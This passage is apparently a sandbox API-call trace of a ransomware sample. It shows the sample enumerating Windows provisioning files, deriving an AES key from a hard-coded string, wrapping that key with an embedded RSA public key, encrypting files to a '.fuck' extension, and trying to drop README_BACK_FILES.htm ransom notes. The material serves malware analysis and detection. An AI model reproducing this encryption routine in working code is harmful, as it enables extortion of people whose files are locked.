"c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.199] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.199] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg")) returned 0 [0237.200] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.fuck")) returned 0 [0237.200] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.200] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.200] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.200] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.200] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0237.200] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.200] AreFileApisANSI () returned 1 [0237.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.201] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.201] GetLastError () returned 0x5 [0237.201] GetLastError () returned 0x5 [0237.201] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.201] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0237.201] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\readme_back_files.htm")) returned 0xffffffff [0237.201] AreFileApisANSI () returned 1 [0237.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.201] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.202] GetLastError () returned 0x5 [0237.202] GetLastError () returned 0x5 [0237.202] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.202] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817098 [0237.202] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.202] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.202] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.202] GetLastError () returned 0x5 [0237.202] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml")) returned 0x20 [0237.202] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.203] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.203] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.203] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.203] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.209] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.209] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.209] CryptHashData (hHash=0x2817458, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.209] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817b58) returned 1 [0237.209] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.209] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.209] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28341c0) returned 1 [0237.210] CryptImportPublicKeyInfo (in: hCryptProv=0x28341c0, dwCertEncodingType=0x1, pInfo=0x283a868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a898*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a8a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28179d8) returned 1 [0237.210] CryptEncrypt (in: hKey=0x28179d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.210] CryptEncrypt (in: hKey=0x28179d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833fa0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833fa0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.211] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833fa0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.211] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.211] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.211] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.211] CloseHandle (hObject=0xffffffff) returned 1 [0237.211] CloseHandle (hObject=0xffffffff) returned 1 [0237.211] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.211] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.212] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.gsg")) returned 0 [0237.212] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.fuck")) returned 0 [0237.212] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.212] CryptDestroyKey (hKey=0x2817b58) returned 1 [0237.212] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.212] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.212] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.230] GetLastError () returned 0x5 [0237.230] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml")) returned 0x20 [0237.230] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.231] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.231] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.231] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.231] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.237] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.237] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.237] CryptHashData (hHash=0x2817298, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.237] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817b58) returned 1 [0237.237] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.237] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.237] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2834028) returned 1 [0237.238] CryptImportPublicKeyInfo (in: hCryptProv=0x2834028, dwCertEncodingType=0x1, pInfo=0x283ac78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283aca8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283acb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817b98) returned 1 [0237.239] CryptEncrypt (in: hKey=0x2817b98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.239] CryptEncrypt (in: hKey=0x2817b98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833698*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833698*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.239] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833698, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.239] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.239] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.239] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.239] CloseHandle (hObject=0xffffffff) returned 1 [0237.239] CloseHandle (hObject=0xffffffff) returned 1 [0237.239] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.240] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.240] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.gsg")) returned 0 [0237.240] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml.fuck")) returned 0 [0237.241] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.241] CryptDestroyKey (hKey=0x2817b58) returned 1 [0237.241] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.241] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.241] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817298 [0237.241] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.241] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.241] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2817458 [0237.241] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.241] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.241] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.241] GetLastError () returned 0x5 [0237.242] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.242] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.243] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.243] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.243] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.244] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832f28) returned 1 [0237.249] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.249] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.249] CryptHashData (hHash=0x2817858, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.249] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817858, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817a18) returned 1 [0237.249] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.249] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.249] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2834248) returned 1 [0237.251] CryptImportPublicKeyInfo (in: hCryptProv=0x2834248, dwCertEncodingType=0x1, pInfo=0x283a938*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a968*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a970*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817a58) returned 1 [0237.251] CryptEncrypt (in: hKey=0x2817a58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.251] CryptEncrypt (in: hKey=0x2817a58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833e08*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2833e08*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.251] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833e08, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.251] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.251] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.251] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.251] CloseHandle (hObject=0xffffffff) returned 1 [0237.252] CloseHandle (hObject=0xffffffff) returned 1 [0237.252] CopyFileA 